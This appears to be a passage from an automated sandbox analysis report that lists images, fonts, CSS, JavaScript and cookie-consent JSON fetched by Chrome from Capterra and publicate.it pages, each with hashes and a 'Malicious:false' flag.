                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTE...bab....C..........Liq..................^..c.................p.................k.....g.....Q..R..S..Q..Q..P..P..R..Q..P..Q..P..Q.......R..N.......L..N..R..Q..M....O..R..R..T..O..J....L..V..S..L..N..H..U....Q................N........Y..\..`..Y....v.O..P..S.M..Q..^....e..D..|....h..O....h..T.O.Xr....p.....`n......c..\............V..p...........fi.._.....`..................T.V....R....l.....].................U..X..y.....a..t........l....\...ke.....b..b....~.W....t.g..........z\..l...a....r..{.\..g.s.l..d~.z.R...m..e.o....w..ew.[..[.t.....b.u_......x..v.Z.pc..}.......k...........X..........fm...........Y........Nz..iZ................1.K.....................}..............n... tRNS..................1.J..j...........}....pHYs............... .IDATx..[l......|...m.v.C.FDfd&..P.)..,..A.6.../X.r.)................H.o... H4@...iR ...[...-.eK..>#K...b....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2
                                                                                                                                                                                                        Entropy (8bit):1.0
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:H:H
                                                                                                                                                                                                        MD5:99914B932BD37A50B983C5E7C90AE93B
                                                                                                                                                                                                        SHA1:BF21A9E8FBC5A3846FB05B4FA0859E0917B2202F
                                                                                                                                                                                                        SHA-256:44136FA355B3678A1146AD16F7E8649E94FB4FC21FE77E8310C060F61CAAFF8A
                                                                                                                                                                                                        SHA-512:27C74670ADB75075FAD058D5CEAF7B20C4E7786C83BAE8A32F626F9782AF34C9A33C2046EF60FD2A7878D378E29FEC851806BBD9A67878F3A9F1CDA4830763FD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 130 x 130, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8100
                                                                                                                                                                                                        Entropy (8bit):7.928165034912485
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:73YaXtI4o3h4lBIXQxDlsFTNdqiMAeLltI4GkDe5p1FvF:73YaX+pRuIXPSWeL/yU+pT9
                                                                                                                                                                                                        MD5:709304D9878661A073C26FF24A0263B8
                                                                                                                                                                                                        SHA1:0CF32C2AAE967CD94CCF3BD5C783065A76B9E954
                                                                                                                                                                                                        SHA-256:1C3A294201FA7031203CF8D98C47451D3AC0322D56EF258AF91B65759C19E383
                                                                                                                                                                                                        SHA-512:3B57D2C828FC5E289A03DC424D2A2D420240D7E9B8E4555FD98DBAE789D1989C889F00EF587996B03891DAA04B21FC4B34CF49D1AC1969592D19CB121C2CACFB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/adobe_review.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.1 (Macintosh)" xmpMM:InstanceID="xmp.iid:51531A79361411ED8117A6A9EBB8A27F" xmpMM:DocumentID="xmp.did:51531A7A361411ED8117A6A9EBB8A27F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:51531A77361411ED8117A6A9EBB8A27F" stRef:documentID="xmp.did:51531A78361411ED8117A6A9EBB8A27F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>a.'.....IDATx..].|..?..l..l..y...@..T". ".......`..V...m.m.m....V.k.( ...hQ.b.&D ....B..y?7....w.M..nf7.!.9.....
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8028
                                                                                                                                                                                                        Entropy (8bit):7.975943413257389
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:nQVB/tMMVCKM/KBrS186Rmm+0MUxbBh7takdBX3t8vhC10uAS:UFRsB/sHKmWMsFa4BX3t4hCjAS
                                                                                                                                                                                                        MD5:616623443A5C5299FF0DEFAE49527EB7
                                                                                                                                                                                                        SHA1:8CF4ACBECA8FB5A736F352EE2F6472F5AA487A34
                                                                                                                                                                                                        SHA-256:28F034891996679D4A33E89F60A6F1A3A11A106290843FD914CD3DCEB952DDF7
                                                                                                                                                                                                        SHA-512:84CDAB050E685DBE5F1C26DB4E75EC41B334216279208A82964B9950680E670B6EB3B5A5F601BFE81F4A265DC6D0E749662B1B0C4235D664FF344ABBEFB41A5B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^..|.U.........B......r..".9DD..u......g.q....2:..x...x...En........$....;...W.h.t']..$.o>MH..W..;.......C......J)!.y<_....vH..B).V..4..Yn8V..c.. ...&+..xD.L.t...{)..U.j../....2..40.X:...S.-.GTC...JrHU..R..:....p...H.B..*FW..e&.Vb...6.z&.....gu.5...!J[...t/..xh.C.j..,..G....:Fx..4...*.(...Q.R.Q@(....G.PA................(....=_......@.a.A. .h.}.$t3H....5.o..=xz.Z.nZ9==.#..).cW.....P.IIM'0.5_.-..!.~....Y......2O.Uf.z ....,p.......K....t.Y....*..)9g9iy.$..Z....L.....W........|t..$...QkR.~k....c......D..G?.w.L,.81....R..2u.UVKU^..;...9.....9k.......;.r....v.....4.?.8.....-UR...#CV.L.....t...f.Wa f.*.....18..._....t.:]t....].-..F*..A....D.@.....qB9......w0....a..f..G'.y16M5..<g..W..Q!...A)...*.e.....S4...v...<.......yw..+...p..9.N6...V*.e...:p..y((.....R..).../Y........P...|..w.+.N=..k.D9{~z.AY..T.HbI.9.Y..|x...D..Iw..&T...V+./S%.7o.i@U...`B....>..G.f..s...E.wz.f........zo. (.%.9.'.a.YU.8Q~I.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                        MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                        SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                        SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                        SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4040
                                                                                                                                                                                                        Entropy (8bit):7.095214561312683
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:+zYjwMcjFflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgx:+0jbc5N26MT0D5MdtbZPAVwzVHlR8s4
                                                                                                                                                                                                        MD5:C9C2612D389F722738C199830A79881A
                                                                                                                                                                                                        SHA1:10308614E024925E50631DE905899F69F68561A4
                                                                                                                                                                                                        SHA-256:2613EE7AE8C266E846475A4CC0D855D32B0DC8C70090C871F2F7BEDA7AEF51B7
                                                                                                                                                                                                        SHA-512:D0AACBE35E229DE9E468E3553088359B0CE42D80F6C67A3EBBE4C2BB4051D63C0F5380FCACADB7E50979B1F3DC0FF3BD723A3F121ADD3A7678B8E83ED57C8C1A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/bcf1f306-bfbc-4489-9efe-4cea2b273e4e.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o...Y...(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):97930
                                                                                                                                                                                                        Entropy (8bit):7.98785033288875
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:gwdYkR3gl3tgeKvih2GKxmmeLmIya2kMKkCrA3UEcXu/34aewjEk5siFLhL+dqg0:gtkRUgVvi7KaF2kMHRUEdjrF1qdqgHU
                                                                                                                                                                                                        MD5:84EAA1864BF35D534DCB91BF9D49119B
                                                                                                                                                                                                        SHA1:B2410BB0726018DBD6234D97356CC87FD0F11A58
                                                                                                                                                                                                        SHA-256:E9D4F55AB82BA81802FB2C03666F4F2DEBC61011A65FC5B4597178AC0B0ADAA9
                                                                                                                                                                                                        SHA-512:C683585081D2FAB8CF840F3CADA75EE410749E7B558974DEBB68E5E12F40401D0113D326747202CF80364CE5B6488420C6CE3C53F223CF8BA827F6CC592EEC59
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/template3-p-500.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTE..............bba..............r.....u.............................................................%...............#........*%.....d.+ ..a.% ..g..^I...4'.|YC1!..cOT7..fX.hVrP;_?%...k_;,.lH-.uieC*.qfyU<?'.N0.-..}`QC1.`<..m_K=%9!....sTC...H8.lK7G,.W:"[N/.dU9...yZJ.....].....zp^N;tN1...RF(l\@.oaM..............rX...XC/dG3..i..fVEjC".ya{kM.......x|.......VUT?3"........i.....\\]..p......]3.qsy..v.............v.ikp.......OMJ.hBcdg..s..y.f.[..GE>..<:6.........d.....u....g\H...}.........N/...n........sX...zb..w.....{L!.]4...S.......Y3.nHkU..u............!...n:...*.zO.......+......kC......{........f.....A..Z...wNK.......}.......b..Z...[H...-)....>-......@........8..o.O......+..tv.m..cf....%.4.Q...K..H./......tRNS..............B.g....S......pHYs............... .IDATx...O[g.6....l......."..M.#..q...N3...B.....!`.).........qg.Ekg....VH..1.R.!").3.$.......TC...q..j?.........yg..iclc.c|..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4372
                                                                                                                                                                                                        Entropy (8bit):7.942436557083691
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:kK9Uf7vppzwnCWIR6RCqiP8Eu0+QeGN29NKJdgmRkw4EoRzJbjiCXL:kK9Uzv0IR6LTET+DGNTJdtRkw4EWJbuK
                                                                                                                                                                                                        MD5:86E78F4D17E04F7845DACA7153F1BBA3
                                                                                                                                                                                                        SHA1:4DF3034F63F98CD2F1E6E09A73F13A604ADF2B7E
                                                                                                                                                                                                        SHA-256:4AB0EDF0E5AB2AF6CF51E88AEC75D52AA49346E5B030D0E6B58C0FFAD39C2979
                                                                                                                                                                                                        SHA-512:2AA14A8B49E51C8710CD4A6D3A085A148B26854D0F44085374C96034157AD14205224BB91A61F904C8FB321B99EB79CEAB0DF69A9DF202FF095AA792F71B1BCF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...........8....sRGB.........IDATx^.\.p\.y......Ivm..Cb.P.#q1.....v.K.x..&f..h...<f..RhC.........!.@.%.@D.....B..1..y...H...v..;...{W...MF.g...}.w....?.^.4.BjU..Z...!.....wo....T..Q...'k-.D.8\.@)k..i.?.Pi.QH09.....%.{_..J0..7...3.4...Z.zc.@ .....^.K..P..S.e.$.......J....5I.eH[[.f..1."`w..v..`R..m......V...p0...8.....A..2.......>..N......o~-....].,.dTA..F............ .......... .m.J.P.{.P..X..8."'...@j..C.m..\..oh...?....$Cn-..@?.`.;..@Z.Po.fT.D{.qL.....+". ......I..;.._..._....~.....U......W..........w..c.:'e..pgz...K...?.0......Et..V'..s.$`\...xov.<...c..'..'..^...V..PB../.U.HO\C..-...kjv...o...H_..-.#.\.....*.e3...iWZ..&%8.2|:Y.....G.8...i...p&:-.}.Q.........(....^q.Zm..3.k..x.S..m.......-u/@.i....294...tF...Q.N...=.....6..&c@.dFK..dz...yIFk....OX.G.jmF...._.....x.....k.M.B2...;+#.~K...W-..r....v.0.. .1....D.k....M.d%b.H.moa..lE.....t.g...@........C.c.N...t.......CD..3...l../....J._x.....#f.....X..2p....TT..../.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13
                                                                                                                                                                                                        Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                        MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                        SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                        SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                        SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://td.doubleclick.net/td/fls/rul/activityi;fledge=1;src=8036043;type=visit;cat=capte0;ord=1421174349590;npa=0;auiddc=1810143887.1725034608;ps=1;pcor=1226563587;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Freviews.capterra.com%2Fsearch%2F?
                                                                                                                                                                                                        Preview:<html></html>
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13317), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13317
                                                                                                                                                                                                        Entropy (8bit):5.454706754813381
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:btL792ziKXad1mW2BjyhwCoMcRWIF8aH4baTf9z20McqQRFxYyu4Bylw:xfqiKXfbkXqgGf80MuG4Mlw
                                                                                                                                                                                                        MD5:E53CEA0ACBD753EF5403FE1582A917DD
                                                                                                                                                                                                        SHA1:007782C38336B1BF845CC2BA2FAC504A00DA9CEA
                                                                                                                                                                                                        SHA-256:D605C05AEB85FBC19E14FE322E7CB66C4FC230B2A747E40153FA8B9B3AD56E58
                                                                                                                                                                                                        SHA-512:228652AE806F9D2CF93C86FEE1FEE656C5C7AF195936826592A794D8B7F6E1504AAFE85EF7380629FB90DD88F3D84D583216E0EDC51EE30D9E80B7124AC8406C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5658],{35658:function(e,t,n){Object.defineProperty(t,"__esModule",{value:!0}),Object.defineProperty(t,"Image",{enumerable:!0,get:function(){return v}});let r=n(84732),i=n(45622),o=n(27573),a=i._(n(7653)),l=r._(n(3458)),s=r._(n(64830)),u=n(84163),d=n(68703),f=n(9273);n(81673);let c=n(1917),p=r._(n(43804)),g={deviceSizes:[640,750,828,1080,1200,1920,2048,3840],imageSizes:[16,32,48,64,96,128,256,384],path:"/assets-capterra-monorepo-bx-capterra-www/_next/image/",loader:"default",dangerouslyAllowSVG:!1,unoptimized:!1};function m(e,t,n,r,i,o,a){let l=null==e?void 0:e.src;e&&e["data-loaded-src"]!==l&&(e["data-loaded-src"]=l,("decode"in e?e.decode():Promise.resolve()).catch(()=>{}).then(()=>{if(e.parentElement&&e.isConnected){if("empty"!==t&&i(!0),null==n?void 0:n.current){let t=new Event("load");Object.defineProperty(t,"target",{writable:!1,value:e});let r=!1,i=!1;n.current({...t,nativeEvent:t,currentTarget:e,target:e,isDefa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 22504, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):22504
                                                                                                                                                                                                        Entropy (8bit):7.9897727403675995
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:ZbL6k1TUlBxUp5VLlLJGv2VulERzgWuXlY9zehEsapJznPEUAAnUgf0n6iXatBbF:pLfTuYfVVJGv2VuIzgWAlYteh6nPEzAF
                                                                                                                                                                                                        MD5:1C6C65523675ABC6FCD78E804325BD77
                                                                                                                                                                                                        SHA1:898D9808304DC157F5DCB18CA169EC6E2B96B3D7
                                                                                                                                                                                                        SHA-256:08664859BAAB5ED98F0BF818ED77E38464FF1826DC6406D5ECBD651409AFBD92
                                                                                                                                                                                                        SHA-512:1505E8496C9BEE214C5F8815F8D88A31FFE2BAEB6FBA81A8228BD52220B9B2BB10464C1E1DBA11D6881583DFA478CDFB30A79CFA6F069C362FB65443FEB06918
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/lato/v24/S6u9w4BMUTPHh50XSwiPGQ.woff2
                                                                                                                                                                                                        Preview:wOF2......W..........W...........................z.p.`..D....e........Q..B..6.$..v. .....E.K...%...v.H$..F".... .ef ..D..[g..Nr"c.....U{AA.i.L.0.zkT.P.......BV.q.....`6.....>...[...E:4..d^.7..L......vL.\..xL..f.......T.....I......%.>+...95.N...<].....h.o7..).-....]R#..]....I..(W9..P........((...E....i}.eY.ys.y..^....k....9.s_....I...&D..Zf.C.1...CnfxQb....#.K..]....^.;3..~.@...V......:i..9...6.vU2+D.z...U......N.%..d..*..%...s.7...NM...I.i...<v....:.B...{..B..>.T$..@+....|Y.>........8..Wo......r./..r.hJ...a.Dm......f..Uk...F..k......f.\...L.....s..."M......k{Ib.%.E"C...J..Jj[.Y.;...d..@........A.}....+1). m.t~...-.f...J..Cu.Z]umgqZJ..IN........c.8"v.L.q.CzU..v...{.5U....WJ.:o..<...j}...J.Dif.f~.g....N.do.~.U......x....AJ"A.)..H.I.D......:...1X..~.....W.LE.......).q.Q......K.\..rw]p......)}xP...Zj.@...(B.8.!..9$Va.8...Q....o...k...LB*.j.......l.0.G.B|Q.o.j.U.vg+k.#.0.<8.....Z...xQ...m....x..s3.....d`....;.+..smW.8A.d..._........D...%..'.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7682
                                                                                                                                                                                                        Entropy (8bit):7.970934644271178
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:o+EvguHmlJKcJ10N2tnA+JAbjhUDrsUXenMDS7H:oNVmLKH2q+JAb1UDrsUJu7H
                                                                                                                                                                                                        MD5:DA683EFAF52E5EFE61867FF9A10AA361
                                                                                                                                                                                                        SHA1:842089AC19347EED657D56683A2303A83D061069
                                                                                                                                                                                                        SHA-256:CCD0E1332F0734B33EA4646E28D5BF0F5F1936EFF767BA161B1E9AE79FA12AC7
                                                                                                                                                                                                        SHA-512:3F63EEB2D453285248EC71BAD09C8C87B234C95B79A81830BB14776291811136BEAE99D01841009E14DB6EA92CBF7113DCB458CEBE9094EFD6179ECA20C1D16A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.]y...Y....cwuKY.dY..8.ql.v.;.b;.8>"l...(...T."...7E..Y.....8C%.@HQ.!....#&..8>...8....3....Q.{.==.;.lk.3A.Z.==}..}.{.....YY{.....9...$g.~...4...x.@2"l.a2...ABA.` ..'NEg.Y..J.....I...!'....0...1)w.|..<...$..'0...Y..|..lZ........&..!..r.%6.&)..0..4".c.......6..O..!x...1.......v.... J...K..h..R.NZ.,.s..M....xp~p.b.{_...-..1.<.....t.mT3.mY..f,2L.$.n'3y......*^.....!..8j:O.j<....f...xBx#H.r....I...{D.Q.A......E....b{..~BzB...L..S........I..e..F.....C.L....d.D[C{..`*(........{.,=..5pcM....J0.@.v.b.].S....b......=.....[w.c~b.._g@...[M......q.'....N..i...:.z.../.n.l..Z....B..h........|.u..../p..5.2-@..x6(..y....K.?.L!... S.4!...q...-.....=..c.x.D....P......u]H<...F...'7{..r."5..h.lReJ.n..x.....?p..l.>'......X.>........o.d.sQ.x..7..P.>.A..-Hl?s-../....5.....\.8.7.........2}@..r..t..i...xa.k.j.....y...[.d .g..1.-.....>.GE...[.......wn/....A...c.!.y...[.#.2N...4........j.ro.....|!..#..|..N.....~...\X9
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (2587)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):39238
                                                                                                                                                                                                        Entropy (8bit):5.259282385745772
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:ef7A1YREqHrFIfoF7bpFMDw82aWoS+lyKA+vdxUF3F5FiwFt24qOqClUZ6CE7WkT:t1YlHr57CPUljdeOqCqE2kQ2
                                                                                                                                                                                                        MD5:1DD4F94EE5198D145E409AA7DAA901F0
                                                                                                                                                                                                        SHA1:CDE0A38E216586D7B89225F9980899FF1C00B56E
                                                                                                                                                                                                        SHA-256:8F110D5822DE4C0B1051703A8D4B43D45776AF7654CB95E252E1581CF2B566B8
                                                                                                                                                                                                        SHA-512:F7AED75CAC97A6D8B08ABBE0BEA64FC5549D1A42929C659D03D9EDBAB2D2D5AC559FC7124934DC365E8B37E888AF209E4AC753DDE708930B94D3C12BB62F6B6C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/css/webflow.css
                                                                                                                                                                                                        Preview:@font-face {. font-family: 'webflow-icons';. src: url("data:application/x-font-ttf;charset=utf-8;base64,AAEAAAALAIAAAwAwT1MvMg8SBiUAAAC8AAAAYGNtYXDpP+a4AAABHAAAAFxnYXNwAAAAEAAAAXgAAAAIZ2x5ZmhS2XEAAAGAAAADHGhlYWQTFw3HAAAEnAAAADZoaGVhCXYFgQAABNQAAAAkaG10eCe4A1oAAAT4AAAAMGxvY2EDtALGAAAFKAAAABptYXhwABAAPgAABUQAAAAgbmFtZSoCsMsAAAVkAAABznBvc3QAAwAAAAAHNAAAACAAAwP4AZAABQAAApkCzAAAAI8CmQLMAAAB6wAzAQkAAAAAAAAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAABAAADpAwPA/8AAQAPAAEAAAAABAAAAAAAAAAAAAAAgAAAAAAADAAAAAwAAABwAAQADAAAAHAADAAEAAAAcAAQAQAAAAAwACAACAAQAAQAg5gPpA//9//8AAAAAACDmAOkA//3//wAB/+MaBBcIAAMAAQAAAAAAAAAAAAAAAAABAAH//wAPAAEAAAAAAAAAAAACAAA3OQEAAAAAAQAAAAAAAAAAAAIAADc5AQAAAAABAAAAAAAAAAAAAgAANzkBAAAAAAEBIAAAAyADgAAFAAAJAQcJARcDIP5AQAGA/oBAAcABwED+gP6AQAABAOAAAALgA4AABQAAEwEXCQEH4AHAQP6AAYBAAcABwED+gP6AQAAAAwDAAOADQALAAA8AHwAvAAABISIGHQEUFjMhMjY9ATQmByEiBh0BFBYzITI2PQE0JgchIgYdARQWMyEyNj0BNCYDIP3ADRMTDQJADRMTDf3ADRMTDQJADRMTDf3ADRMTDQJADRMTAsATDSANExMNIA0TwBMNIA0TEw0gDRPAEw0gDRMTDSANEwAAAAABAJ0AtA
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):152155
                                                                                                                                                                                                        Entropy (8bit):5.231586341792799
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:AOLMWBDYJNZGTugHZdvh1B7WJQgLBdyCBlYTql33c6OuSSlHtRzI3Y7B:HLDTpvCvYTyhlHtRI3Y7B
                                                                                                                                                                                                        MD5:FD1598280E49AE07C15F156A363BA610
                                                                                                                                                                                                        SHA1:7483BC20D09EACD74F77C91A26CD6BB2A3272B92
                                                                                                                                                                                                        SHA-256:3201B5E27DC03E67530643DB5E4F692DAC4039C2C8C84D7A9C1257805628B9D2
                                                                                                                                                                                                        SHA-512:1FCE0261D144AA64B40461786806635A3C367F393857FFC366DCC62CB3F595C2538AB0DC5ABEAF30A3090A73CBF60DF3F6416290DE3214991F6DA6AE4B96AE10
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","pccontinueWithoutAcceptText":"Continue without Accepting","pccloseButtonType":"Icon","MainText":"Do Not Share My Personal Information","MainInfoText":"Capterra may share your information with trusted partners to customize your experience and show you ads outside of Capterra.com. If you would like to opt out of this sharing, select the option below. Please note that this choice only impacts certain marketing activities. To further manage your cookie preferences, refer to the <a href=\"https://www.capterra.com/legal/cookie-policy/\">Cookie Policy</a> for more information.","AboutText":"","AboutCookiesText":"Your Privacy","ConfirmText":"","AllowAllText":"Save Settings","CookiesUsedText":"Cookies used","CookiesDescText":"Description","AboutLink":"","ActiveText":"Active","AlwaysActiveText":"Always Active","AlwaysInactiveText":"Always Inactive","PCShowA
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 32x32, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):663
                                                                                                                                                                                                        Entropy (8bit):6.55597138264617
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:tLpLjEFLjEm9vOEsWMxGVURM3+yySfsUJ5JmnMHr+YNHnHROSNE:TYzvO2VURYbH75Juo5NHQSi
                                                                                                                                                                                                        MD5:29D78EBFD4AFF1D1D224DF1FC8E289F2
                                                                                                                                                                                                        SHA1:CFEB7F81EDA99FD76A7212E0D3E6AB6841D589D4
                                                                                                                                                                                                        SHA-256:AF82B82070B35FD62C78D0E824A0AE0BDEA862ED57485C63AAD48BE0C634C641
                                                                                                                                                                                                        SHA-512:6B1B6D10ECE314F36232984BDF637F3820364C1D4465931EC7A724A3BD60CC648303630B7144FD1F230E5F59D8D16AF5FC497FA9121BD00347F3581A1188EEB2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
